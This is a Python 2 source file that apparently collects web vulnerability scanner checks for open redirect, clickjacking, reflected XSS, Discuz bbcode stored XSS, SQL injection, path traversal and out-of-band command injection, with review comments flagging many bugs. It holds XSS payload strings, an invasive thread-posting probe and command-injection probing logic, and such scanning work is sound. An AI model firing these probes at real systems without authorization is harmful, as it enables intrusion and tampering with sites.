def run_url(http, ob, item):
    '''
    Open-redirect probe for one crawled URL (item).

    For every query parameter of item['url'] whose value getDomain()
    reports as a URL, the value is replaced by a fixed third-party page
    and the response body is searched for that page's known marker text;
    a hit is recorded through getRecord. Returns the list of records
    (empty when nothing matched).

    http -- not used: a fresh Http(timeout=ob['webTimeout']) is built below
    ob   -- scan config dict (domain, level, optional source_ip/webTimeout)
    item -- crawled request dict (url, method, refer)

    getDomain, post_query2dict, dict2query, Http, getRequest/getResponse/
    getRecord and logger are defined elsewhere in the project.
    '''
    header = {
        "Host": ob['domain'],
        "Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Referer": item['refer'],
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        # Cookie deliberately left disabled: the probe runs unauthenticated.
        # "Cookie": ob.get('cookie')
    }
    try:
        path = item['url']
        method = item['method']  # read but never used below
        timeout = ob.get('webTimeout')
        # Shadows the http argument: the caller's client is not used.
        http = Http(timeout=timeout)
        url_parse = urlparse(path)
        netloc = url_parse.netloc
        source_ip = ob.get('source_ip')
        if source_ip:
            # Send to an explicit origin IP while Host keeps the configured domain.
            netloc = source_ip
        query_dict = post_query2dict(path)
        result = []
        # query_dict is mutated in place (no copy), so substitutions accumulate
        # across keys within one run.
        for key in query_dict.keys():
            url2 = getDomain(query_dict[key])
            print url2  # debug output left in
            if url2:
                query_dict[key] = 'http://openresty.org/cn/'
                print(query_dict[key])  # debug output left in
                new_query = dict2query(query_dict)
                new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path, new_query)
                # print new_url
                res, content = http.request(new_url, 'GET', headers=header)
                # The response status is not inspected: any response whose body
                # embeds the substituted page's marker text counts as a hit,
                # not only a redirect that the client followed.
                c = re.search('''OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。''', content)
                if c:
                    response = getResponse(res, content, 'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。')
                    # Recorded as 'POST' although the probe above was sent as GET.
                    request = getRequest(path, 'POST', headers=header, domain=ob['domain'])
                    detail = "存在任意网址跳转漏洞"
                    result.append(
                        getRecord(ob, path, ob['level'], detail, request, response))
        return result
    except Exception, e:
        logger.error("File:PageredirectsScript_yd.py, run_url function :%s" % (str(e)))
        # result is bound only after several statements inside the try; a
        # failure before `result = []` makes this line raise NameError.
        return result
def run_url(http, config, item):
    '''
    Check one crawled URL for <iframe> elements whose src points off-site.

    (The original docstring described SQL-injection detection; the code
    below looks for iframes, not SQL injection.) On an exception the error
    is logged and [] is returned; on an off-site iframe a one-element list
    of records is returned. When no off-site iframe is found the function
    falls off the end and returns None, not a list.

    http   -- unused here; requests go through the module-level request()
    config -- scan config (siteId, ip, domain, level, vulId, cookie, source_ip)
    item   -- crawled request dict (url, method, params)
    '''
    try:
        # Re-pack the request parameters
        scanInfo = {}
        scanInfo['siteId'] = config['siteId']
        scanInfo['ip'] = config['ip']
        scanInfo['domain'] = config['domain']
        scanInfo['level'] = config['level']
        scanInfo['vulId'] = config['vulId']
        # Aliases the module-level default dict rather than copying it: the
        # cookie and Host written next persist in headerDictDefault for every
        # later caller and site. dict(headerDictDefault) would isolate them.
        headers = headerDictDefault
        headers['cookie'] = config['cookie']
        headers['Host'] = config['domain']
        source_ip = config.get('source_ip')
        responseList = []
        url = item['url']
        url_parse = urlparse.urlparse(url)
        scheme = url_parse.scheme
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query
        if source_ip:
            # Connect to an explicit origin IP; Host keeps the configured domain.
            domain = source_ip
        if query:
            new_url = "%s://%s%s?%s" % (scheme, domain, path, query)
        else:
            new_url = "%s://%s%s" % (scheme, domain, path)
        if item['method'].lower() == 'get':
            # GET: crawled params are appended as the query string
            url = "%s?%s" % (new_url, item['params'])
            bodyDict={}
        else:
            # POST: crawled params become the body
            url = new_url
            bodyDict = db_params2dict(item['params'])
        urlBase, queryDict = post_all_query2dict(item['url'])  # both unused
        response = request(url=url, body=dict2query(bodyDict), headers=headers, method=item['method'])
        pattern = r'<iframe.*?src="(.*?)"'
        matches = re.findall(pattern, response['response_body'])
        for row in matches:
            parse = urlparse.urlparse(row)
            # Flags any iframe whose host differs from the configured domain
            # (a relative src has an empty netloc and is flagged too). The
            # direct test for framing protection would be X-Frame-Options /
            # CSP frame-ancestors on the response headers.
            if scanInfo['domain'] != parse.netloc:
                injectInfo = returnInjectResult(url=url, confirm=0, detail='点击劫持,iframe连接到了外站', response=response)
                responseList.append(getRecord2(scanInfo, injectInfo))
                return responseList
            else:
                print scanInfo['domain'], parse.netloc  # debug output left in
    except Exception,e:
        logger.error("File:ClickJacking_iframe.py, run_url function :%s" % (str(e)))
        return []
def run_url(http, ob, item):
    '''
    Reflected-XSS probe for one crawled URL.

    Each string in inj_list is appended to every parameter value (or to the
    URL path when a GET request has no parameters) and the response body is
    searched with re_obj. For POST the URL query is probed first (body
    unchanged), then the body (query unchanged). Hits are appended to
    result via getRecord, but the function has no return statement, so the
    caller always receives None.

    http -- client with .request(url=, method=, headers=[, body=])
    ob   -- scan config (scheme, domain, level, optional source_ip)
    item -- crawled request dict (url, method, params)
    '''
    method = item.get('method')
    # AttributeError here when item has no 'method' (get() returned None).
    method = method.lower()
    if method not in ['get', 'post']:
        return []
    params = item.get('params')
    # Probe strings; the first five are kept for reference but disabled.
    inj_list = [
        # '''<sCrIpt>alert(123)</ScRiPt>''',
        # ''''><sCrIpt>alert(123)</ScRiPt>''',
        # '''"><sCrIpt>alert(123)</ScRiPt>''',
        # '''';</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        # '''";</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        '''-->''''''"""""">>>>>>;;;;;;</ScrIpt><sCrIpt>alert(123)</ScRiPt>//''',
        '''-->''''''"""""">>>>>>;;;;;;<source%20onerror="javascript:alert(123)">''',
        '''-->''''''"""""">>>>>>;;;;;;<img src=1 onerror=alert(1)>'''
    ]
    url = item['url']
    scheme = ob['scheme']
    domain = ob['domain']
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        # Connect to an explicit origin IP; Host keeps the configured domain.
        domain = source_ip
    url_path = urlparse.urlparse(url).path
    result = []
    # Reflection markers looked for in the response body.
    re_obj = re.compile('(<script>alert\(123\)</script>|javascript:alert\(123\)">|onerror=alert\(1\)>)')
    detail = "检测到XSS漏洞"
    try:
        # GET method
        if method == 'get':
            # No parameters: inject directly into the path
            if not params:
                for payload in inj_list:
                    # Ensure a path separator precedes the payload.
                    if not url_path or url_path[-1] != '/':
                        payload = '/' + payload
                    new_url = '%s://%s%s%s' % (scheme, domain, url_path, payload)
                    res, content = http.request(url=new_url, method='GET', headers=header)
                    # re.I is passed as the `pos` argument of Pattern.search
                    # (the search starts at offset 2); it does not make the
                    # match case-insensitive. Same on every search() below.
                    if re_obj.search(content, re.I):
                        request = getRequest(new_url, domain=ob['domain'])
                        response = getResponse(res, content)
                        result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
            # Parameters present: inject into each query parameter
            else:
                query_dict = query2dict(params)
                for payload in inj_list:
                    for k, v in query_dict.iteritems():
                        # Fresh copy per (payload, key) so only one value is modified.
                        query_dict_cp = deepcopy(query_dict)
                        if v:
                            query_dict_cp[k] = str(v) + payload
                        else:
                            query_dict_cp[k] = '1' + payload
                        new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                        new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
                        res, content = http.request(url=new_url, method='GET', headers=header)
                        # if res.get('status') and res.get('status') == '200':
                        if re_obj.search(content, re.I):
                            request = getRequest(new_url, domain=ob['domain'])
                            response = getResponse(res, content)
                            result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
        # POST method
        else:
            query = urlparse.urlparse(url).query
            body = item.get('params')
            # Inject into the query part, body unchanged
            if query:
                # None (no body) is what http.request receives when params is empty.
                body_str = None
                if body:
                    body_dict = db_params2dict(body)
                    body_str = dict2query(params_dict=body_dict, isUrlEncode=False)
                query_dict = query2dict(query)
                for payload in inj_list:
                    for k, v in query_dict.iteritems():
                        query_dict_cp = deepcopy(query_dict)
                        if v:
                            query_dict_cp[k] = str(v) + payload
                        else:
                            query_dict_cp[k] = '1' + payload
                        new_query = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                        new_url = '%s://%s%s?%s' % (scheme, domain, url_path, new_query)
                        res, content = http.request(url=new_url, method='POST', headers=header, body=body_str)
                        # if res.get('status') and res.get('status') == '200':
                        if re_obj.search(content, re.I):
                            request = postRequest(new_url, domain=ob['domain'])
                            response = getResponse(res, content)
                            result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
            # Inject into the body part, query unchanged
            if body:
                params_dict = db_params2dict(body)
                for payload in inj_list:
                    for k, v in params_dict.iteritems():
                        params_dict_cp = deepcopy(params_dict)
                        if v:
                            params_dict_cp[k] = str(v) + payload
                        else:
                            params_dict_cp[k] = '1' + payload
                        new_params = dict2query(params_dict=params_dict_cp, isUrlEncode=False)
                        # Original query string is kept verbatim.
                        new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query)
                        res, content = http.request(url=new_url, method='POST', headers=header, body=new_params)
                        # if res.get('status') and res.get('status') == '200':
                        if re_obj.search(content, re.I):
                            request = postRequest(new_url, domain=ob['domain'])
                            response = getResponse(res, content)
                            result.append(getRecord(ob, new_url, ob['level'], detail, request, response))
    except Exception, e:
        logger.error("File:xss_inject_new.py, run_url function get method:%s" % (str(e)))
def run_domain(http, config):
    '''
    Discuz! stored-XSS-via-bbcode check, run once per site.

    The docstring this replaced described SQL-injection detection, and the
    `detail` string reported below still names notify_credit.php / blind
    SQL injection, while the request sequence is: fetch forum.php, pick a
    forum id, fetch the new-thread form, POST a test thread containing a
    bbcode payload, then look for the payload in the rendered page.

    This check is invasive: it attempts to create a forum thread on the
    target. In addition, the sys.exit(1) below terminates the whole scanner
    process right after that POST, so the verification code following it
    never runs and the test thread is not cleaned up.

    Returns responseList (only reachable after the sys.exit line), [] on
    an unexpected HTTP status or missing forum id, and None from the
    except branch.

    http   -- unused; requests go through the module-level request()
    config -- scan config (siteId, ip, scheme, domain, level, vulId, cookie,
              optional source_ip)
    '''
    # Re-pack the request parameters
    scanInfo = {}
    scanInfo['siteId'] = config['siteId']
    scanInfo['ip'] = config['ip']
    scanInfo['scheme'] = config['scheme']
    scanInfo['domain'] = config['domain']
    scanInfo['level'] = config['level']
    scanInfo['vulId'] = config['vulId']
    # A private header dict is used here (not the shared headerDictDefault),
    # so the cookie/Referer written below do not leak to other checks.
    # headers = headerDictDefault
    headers = {
        'Accept-Language': 'en-US,en;q=0.5',
        'Connection': 'keep-alive',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0',
        # 'Host': 'discuzx15.target.safety.local.com',
        'Cache-Control': 'max-age=0',
        'Host': config['domain']
    }
    # Session cookie from config; presumably a logged-in user is needed to
    # post — confirm against the scan setup.
    headers['cookie'] = config['cookie']
    # print scanInfo
    responseList = []
    try:
        source_ip = config.get('source_ip')
        if source_ip:
            # Connect to an explicit origin IP; Host keeps the configured domain.
            urlBase = scanInfo['scheme'] + "://" + source_ip
        else:
            urlBase = scanInfo['scheme'] + "://" + scanInfo['domain']
        urlForum = urlBase + "/forum.php"
        response = request(url=urlForum, headers=headers, method="GET")
        # Unexpected status code: give up
        if response['httpcode'] != 200:
            return []
        # patternForumid = re.compile(r'<td\sclass\="fl_icn"\s*><a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I|re.M|re.S)
        patternForumid = re.compile(r'<a\shref\=".*?mod\=forumdisplay&fid\=(.*?)"', re.I | re.M | re.S)
        tmpResult = patternForumid.findall(response['response_body'])
        # print response['response_body']
        # print response['response_headers']
        # No forum section found: give up
        if not tmpResult:
            return []
        # First distinct forum id (set order is arbitrary, so the choice is too).
        forumids = list(set(tmpResult))
        forumid = forumids[0]
        newthreadUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid
        headers['Referer'] = urlBase + "/forum.php?mod=forumdisplay&fid=" + forumid
        response = request(url=newthreadUrl, headers=headers, method="GET")
        # print response['httpcode']
        if response['httpcode'] != 200:
            return []
        print response['response_body']  # debug output left in
        # print len(newthreadUrl), newthreadUrl
        # print headers
        # print response['httpcode']
        # patternForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"', re.I|re.M|re.S)
        # patternPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"', re.I|re.M|re.S)
        # tmpForumhash = patternForumhash.findall(response['response_body'])
        # tmpPosttime = patternPosttime.findall(response['response_body'])
        # Hidden form fields scraped from the new-thread page.
        tmpForumhash = re.compile(r'<input.*?name\="formhash"\sid\="formhash"\svalue\="(.*?)"', re.I | re.M | re.S).findall(response['response_body'])
        tmpPosttime = re.compile(r'<input.*?name\="posttime"\sid\="posttime"\svalue\="(.*?)"', re.I | re.M | re.S).findall(response['response_body'])
        # tmpTid = re.compile(r'<input\s+type="hidden"\s+name\="tid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
        # patternTid = re.compile(r'name\="tid"\svalue\="(.*?)"', re.I|re.M|re.S)
        # patternTid = re.compile(r'"tid"\s*value\="(.*?)"', re.I)
        # tmpTid = patternTid.findall(response['response_body'])
        # tmpPid = re.compile(r'<input\s+type="hidden"\s+name\="pid"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
        # tmpPage = re.compile(r'<input\s+type="hidden"\s+name\="page"\s+value\="(.*?)"', re.I|re.M|re.S).findall(response['response_body'])
        print tmpForumhash  # debug output left in
        print tmpPosttime  # debug output left in
        # print tmpTid
        # print tmpPid
        # print tmpPage
        # sys.exit(1)
        formdata = {}
        # IndexError (caught below) when either field was not found.
        formdata['forumhash'] = tmpForumhash[0]
        formdata['posttime'] = tmpPosttime[0]
        formdata['subject'] = '这里是测试xss_bbcode帖子'
        formdata['message'] = '[email=2"onmouseover="alert(\'tester_xss_bbcode\')]2[/email]'
        formdata['wysiwyg'] = '1'
        formdata['fid'] = forumid
        # formdata['tid'] = tmpTid[0]
        # formdata['pid'] = tmpPid[0]
        # formdata['page'] = tmpPage[0]
        formdata['checkbox'] = 0
        postUrl = urlBase + "/forum.php?mod=post&action=newthread&fid=" + forumid + "&extra=&topicsubmit=yes"
        body = dict2query(formdata)
        headers['Referer'] = newthreadUrl
        # Side effect on the target: submits the test thread.
        response = request(url=postUrl, body=body, headers=headers, method="POST")
        # print response
        if response['httpcode'] != 200:
            return []
        print response['response_body']  # debug output left in
        # Terminates the whole process, not just this check; everything
        # below is unreachable while this line is present.
        sys.exit(1)
        patternEdit = re.compile(r'<a\sclass\="editp"\shref\s="(.*?)">编辑<\/a>', re.I | re.M | re.S)
        patternEdit.findall(response['response_body'])  # result discarded
        response = request(url=postUrl, headers=headers, method="GET")
        patternXssBbcode = re.compile(r'alert\(\'tester_xss_bbcode\'\)', re.I | re.M | re.S)
        # Pattern.match anchors at position 0 of the body.
        match = patternXssBbcode.match(response['response_body'])
        if match:
            injectInfo = returnInjectResult(url=urlBase, confirm=1, detail="Discuz! X1-1.5 的 notify_credit.php 文件由于没有对用户输入进行有效的过滤导致存在SQL盲注", response=response)
            responseList.append(getRecord2(scanInfo, injectInfo))
        return responseList
    except Exception, e:
        # No return here: the caller receives None on error, not [].
        logger.error("File:DiscuzX15_notify_credit.py:" + str(e))
def run_inj(http, ob, item, payloads, inj_type=None):
    '''
    Boolean/error-based SQL-injection probe for one crawled request.

    payloads must be a 2-tuple (payload_t, payload_f). For each parameter
    both variants are appended to the value (value + payload, or
    '1' + payload when the value is empty), the two requests are sent and
    the responses are compared:
      * inj_type == "ERROR型": check_db_error() is run on the responses and
        a record is added when it reports a database error;
      * otherwise: check_page_similar() compares the two responses and
        page_similar() compares the first against ob['waf_page'].
    GET requests inject into the query; POST requests inject into the URL
    query (body unchanged) and then into the body (query unchanged).

    Records are appended to result, but the function never returns it:
    success paths fall off the end and the except branch only logs, so
    callers receive None (the early returns give []).

    http     -- client with .request(url=, method=, headers=[, body=])
    ob       -- scan config (scheme, domain, level, waf_page, optional source_ip)
    item     -- crawled request dict (url, method, params)
    payloads -- (true_variant, false_variant) pair of strings
    inj_type -- label used in the detail text and to select the error branch
    '''
    method = item.get('method')
    if not method:
        return []
    method = method.lower()
    if method not in ['get', 'post']:
        return []
    params = item.get('params')
    if not params:
        return []
    url = item['url']
    scheme = ob['scheme']
    domain = ob['domain']
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        # Connect to an explicit origin IP; Host keeps the configured domain.
        domain = source_ip
    url_path = urlparse.urlparse(url).path
    result = []
    try:
        # GET method
        if method.lower() == 'get':
            query_dict = query2dict(params)
            for k, v in query_dict.iteritems():
                query_dict_cp = deepcopy(query_dict)
                # Loop-invariant unpack; a wrong arity raises ValueError into the except below.
                payload_t, payload_f = payloads
                if v:
                    query_dict_cp[k] = v + payload_t
                else:
                    query_dict_cp[k] = '1' + payload_t
                query_t = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                # Same copy reused: key k is overwritten with the false variant.
                if v:
                    query_dict_cp[k] = v + payload_f
                else:
                    query_dict_cp[k] = '1' + payload_f
                query_f = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t)
                url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f)
                res_t, content_t = http.request(url=url_t, method='GET', headers=header)
                res_f, content_f = http.request(url=url_f, method='GET', headers=header)
                # Only consumed by the commented-out checks and the log line below.
                status_t = res_t.get('status', '0')
                status_f = res_f.get('status', '0')
                if "ERROR型" == inj_type:
                    res_d, db_type_d, msg_d = check_db_error(content_t)
                    # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
                    if res_d:
                        detail = "检测到 %s sql注入漏洞" % inj_type
                        request = getRequest(url_t, domain=ob['domain'])
                        response = getResponse(res_t, content_t)
                        # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                        #     status_t, status_f, content_t, content_f))
                        result.append(
                            getRecord(ob, url_t, ob['level'], detail, request, response))
                    else:
                        res_s, db_type_s, msg_s = check_db_error(content_f)
                        # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
                        if res_s:
                            detail = "检测到 %s sql注入漏洞" % inj_type
                            request = getRequest(url_f, domain=ob['domain'])
                            response = getResponse(res_f, content_f)
                            # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                            #     status_t, status_f, content_t, content_f))
                            result.append(
                                getRecord(ob, url_f, ob['level'], detail, request, response))
                else:
                    similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f)
                    similar_waf = page_similar(status_t, content_t, ob.get('waf_page'))
                    # NOTE(review): the two POST branches below test `similar_waf`
                    # without the `not` used here; which form is intended cannot
                    # be determined from this file.
                    if not similar and not similar_waf:
                        detail = "检测到 %s sql注入漏洞" % inj_type
                        # Logs both full response bodies at ERROR level; bodies may
                        # carry session data or PII, so consider trimming them.
                        logger.error(
                            "status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (status_t, status_f, content_t, content_f))
                        request = getRequest(url_f, domain=ob['domain'])
                        response = getResponse(res_f, content_f)
                        # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                        #     status_t, status_f, content_t, content_f))
                        result.append(
                            getRecord(ob, url_f, ob['level'], detail, request, response))
        # POST method
        else:
            query = urlparse.urlparse(url).query
            body = item.get('params')
            # Inject into the query part, body unchanged
            if query:
                body_str = ''
                if body:
                    body_dict = db_params2dict(body)
                    body_str = dict2query(params_dict=body_dict, isUrlEncode=True)
                query_dict = query2dict(query)
                for k, v in query_dict.iteritems():
                    query_dict_cp = deepcopy(query_dict)
                    payload_t, payload_f = payloads
                    if v:
                        query_dict_cp[k] = v + payload_t
                    else:
                        query_dict_cp[k] = '1' + payload_t
                    query_t = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                    if v:
                        query_dict_cp[k] = v + payload_f
                    else:
                        query_dict_cp[k] = '1' + payload_f
                    query_f = dict2query(params_dict=query_dict_cp, isUrlEncode=True)
                    url_t = '%s://%s%s?%s' % (scheme, domain, url_path, query_t)
                    url_f = '%s://%s%s?%s' % (scheme, domain, url_path, query_f)
                    res_t, content_t = http.request(url=url_t, method='POST', headers=header, body=body_str)
                    res_f, content_f = http.request(url=url_f, method='POST', headers=header, body=body_str)
                    status_t = res_t.get('status', '0')
                    status_f = res_f.get('status', '0')
                    if "ERROR型" == inj_type:
                        res_d, db_type_d, msg_d = check_db_error(content_t)
                        # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
                        if res_d:
                            detail = "检测到 %s sql注入漏洞" % inj_type
                            request = postRequest(url_t, body=body_str, domain=ob['domain'])
                            response = getResponse(res_t, content_t)
                            # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                            #     status_t, status_f, content_t, content_f))
                            result.append(
                                getRecord(ob, url_t, ob['level'], detail, request, response))
                        else:
                            res_s, db_type_s, msg_s = check_db_error(content_f)
                            # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
                            if res_s:
                                detail = "检测到 %s sql注入漏洞" % inj_type
                                # Request recorded with url_t although the hit came from url_f.
                                request = postRequest(url_t, body=body_str, domain=ob['domain'])
                                response = getResponse(res_f, content_f)
                                # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                                #     status_t, status_f, content_t, content_f))
                                result.append(
                                    getRecord(ob, url_f, ob['level'], detail, request, response))
                    else:
                        similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f)
                        similar_waf = page_similar(status_t, content_t, ob.get('waf_page'))
                        # Condition differs from the GET branch (`not similar_waf` there).
                        if not similar and similar_waf:
                            detail = "检测到 %s sql注入漏洞" % inj_type
                            request = postRequest(url_t, body=body_str, domain=ob['domain'])
                            response = getResponse(res_f, content_f)
                            # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                            #     status_t, status_f, content_t, content_f))
                            result.append(
                                getRecord(ob, url_f, ob['level'], detail, request, response))
            # Inject into the body part, query unchanged
            if body:
                params_dict = db_params2dict(body)
                for k, v in params_dict.iteritems():
                    params_dict_cp = deepcopy(params_dict)
                    payload_t, payload_f = payloads
                    if v:
                        params_dict_cp[k] = v + payload_t
                    else:
                        params_dict_cp[k] = '1' + payload_t
                    params_t = dict2query(params_dict=params_dict_cp, isUrlEncode=True)
                    if v:
                        params_dict_cp[k] = v + payload_f
                    else:
                        params_dict_cp[k] = '1' + payload_f
                    params_f = dict2query(params_dict=params_dict_cp, isUrlEncode=True)
                    # Original query string kept verbatim; only the body differs.
                    new_url = '%s://%s%s?%s' % (scheme, domain, url_path, query)
                    res_t, content_t = http.request(url=new_url, method='POST', headers=header, body=params_t)
                    res_f, content_f = http.request(url=new_url, method='POST', headers=header, body=params_f)
                    status_t = res_t.get('status', '0')
                    status_f = res_f.get('status', '0')
                    if "ERROR型" == inj_type:
                        res_d, db_type_d, msg_d = check_db_error(content_t)
                        # if res_d or (status_t == '500' and not page_similar(res_t.get('status'), content_t, ob.get('waf_page'))):
                        if res_d:
                            detail = "检测到 %s sql注入漏洞" % inj_type
                            request = postRequest(new_url, body=params_t, domain=ob['domain'])
                            response = getResponse(res_t, content_t)
                            # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                            #     status_t, status_f, content_t, content_f))
                            result.append(
                                getRecord(ob, new_url, ob['level'], detail, request, response))
                        else:
                            res_s, db_type_s, msg_s = check_db_error(content_f)
                            # if res_s or (status_f == '500' and not page_similar(res_f.get('status'), content_f, ob.get('waf_page'))):
                            if res_s:
                                detail = "检测到 %s sql注入漏洞" % inj_type
                                request = postRequest(new_url, body=params_f, domain=ob['domain'])
                                response = getResponse(res_f, content_f)
                                # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                                #     status_t, status_f, content_t, content_f))
                                result.append(
                                    getRecord(ob, new_url, ob['level'], detail, request, response))
                    else:
                        similar = check_page_similar(status1=status_t, content1=content_t, status2=status_f, content2=content_f)
                        similar_waf = page_similar(status_t, content_t, ob.get('waf_page'))
                        # Condition differs from the GET branch (`not similar_waf` there).
                        if not similar and similar_waf:
                            detail = "检测到 %s sql注入漏洞" % inj_type
                            request = postRequest(new_url, body=params_f, domain=ob['domain'])
                            response = getResponse(res_f, content_f)
                            # logger.error("status_t:%s, status_f:%s, content_t:%s, content_f:%s" % (
                            #     status_t, status_f, content_t, content_f))
                            result.append(
                                getRecord(ob, new_url, ob['level'], detail, request, response))
    except Exception, e:
        # Message names run_url although this function is run_inj.
        logger.error("File:sql_inject_new.py, run_url function:%s" % (str(e)))
def run_url(http, ob, item):
    '''
    Path-traversal probe for one crawled URL (Windows variant, going by the
    file name in the log message below).

    Only parameters whose name matches page|download|path|file|target are
    probed: each value of the module-level inj_path_list is substituted in
    turn and traversal_params() performs the request and the check. The
    first value that yields findings for a parameter stops the loop for
    that parameter. Findings are accumulated in result, but the function
    never returns it — the only return statements are the early
    `return []`, so callers otherwise receive None.

    http -- client passed through to traversal_params
    ob   -- scan config (domain, level, optional cookie/source_ip)
    item -- crawled request dict (url, method, params)
    '''
    header = {
        "Pragma": "no-cache",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "Cache-Control": "no-cache",
        # Session cookie from config; empty string when none is configured.
        "Cookie": ob.get('cookie') if ob.get('cookie') else '',
        "Connection": "keep-alive",
        "Host": ob['domain']
    }
    result = []
    try:
        url = item.get('url')
        params = item.get('params')
        method = item.get('method')
        source_ip = ob.get('source_ip')
        url_parse = urlparse(url)
        scheme = url_parse.scheme
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query
        if source_ip:
            # Connect to an explicit origin IP; Host keeps the configured domain.
            domain = source_ip
        # Nothing to inject into: skip
        if not params and not query:
            return []
        # GET method
        if method.lower() == 'get':
            # For GET the crawled params replace the URL's own query string.
            if params:
                query = params
            # Cheap pre-filter on the raw query before parsing it.
            if query and re.search('page|download|path|file|target', query, re.I):
                query_dict = query2dict(query)
                for key in query_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            query_bak = deepcopy(query_dict)
                            query_bak[key] = inj_value
                            new_query = dict2query(query_bak, isUrlEncode=False)
                            new_url = "%s://%s%s?%s" % (scheme, domain, path, new_query)
                            data = traversal_params(ob, http, new_url, 'GET', '', header)
                            if data:
                                result.extend(data)
                                # Stop trying further values for this key; outer loop continues.
                                break
        elif method.lower() == 'post':
            body_dict = db_params2dict(params)
            # Inject into the query, body unchanged
            if query and re.search('page|download|path|file|target', query, re.I):
                query_dict = query2dict(query)
                for key in query_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            query_bak = deepcopy(query_dict)
                            query_bak[key] = inj_value
                            new_query = dict2query(query_bak, isUrlEncode=False)
                            new_url = "%s://%s%s?%s" % (scheme, domain, path, new_query)
                            data = traversal_params(
                                ob, http, new_url, 'POST', dict2query(body_dict, isUrlEncode=False), header)
                            if data:
                                result.extend(data)
                                break
            # Inject into the body, query unchanged. str() suggests params may
            # not be a plain string here — TODO confirm its type.
            if body_dict and re.search('page|download|path|file|target', str(params), re.I):
                new_url = "%s://%s%s?%s" % (scheme, domain, path, query)
                for key in body_dict.keys():
                    if re.search('page|download|path|file|target', key, re.I):
                        for inj_value in inj_path_list:
                            body_bak = deepcopy(body_dict)
                            body_bak[key] = inj_value
                            new_body = dict2query(body_bak, isUrlEncode=False)
                            data = traversal_params(ob, http, new_url, 'POST', new_body, header)
                            if data:
                                result.extend(data)
                                break
    except Exception, e:
        logger.error("File:dir_traversal_win_url.py, run_url function :%s" % (str(e)))
def run_url(http, ob, item):
    '''
    Out-of-band command-injection probe for one crawled URL.

    _cmd_poc() supplies a random token and a list of probe commands; each
    command is appended to every parameter value (value + ';' + cmd), the
    request is sent, and callback(random_str) is consulted to learn whether
    the token was observed out of band (the detail text says "dns log").
    A second round places the probe in a parameter *name* instead of a
    value. For POST the query part is probed first, then the body.

    Records are appended to result, which is never returned (there is no
    return statement: callers receive None).

    http -- client with .request(url=, method=, headers=[, body=])
    ob   -- scan config (domain, level, cookie, optional source_ip)
    item -- crawled request dict (url, method, params)
    '''
    result = []
    try:
        method = item['method']
        domain = ob['domain']
        header = {
            'Host': domain,
            'Cookie': ob['cookie'] if ob['cookie'] else ''
        }
        source_ip = ob.get('source_ip')
        url = item['url']
        params = item['params']
        # Name-based pre-filter left disabled: every parameter is probed.
        # p1 = r'\bexec\b|command|\bcmd\b'
        # p2 = r'command|\bcmd\b'
        # if not params:
        #     return result
        # if not (re.search(p1, url, re.I) or re.search(p2, params, re.I|re.M)):
        #     return result
        url_parse = urlparse(url)
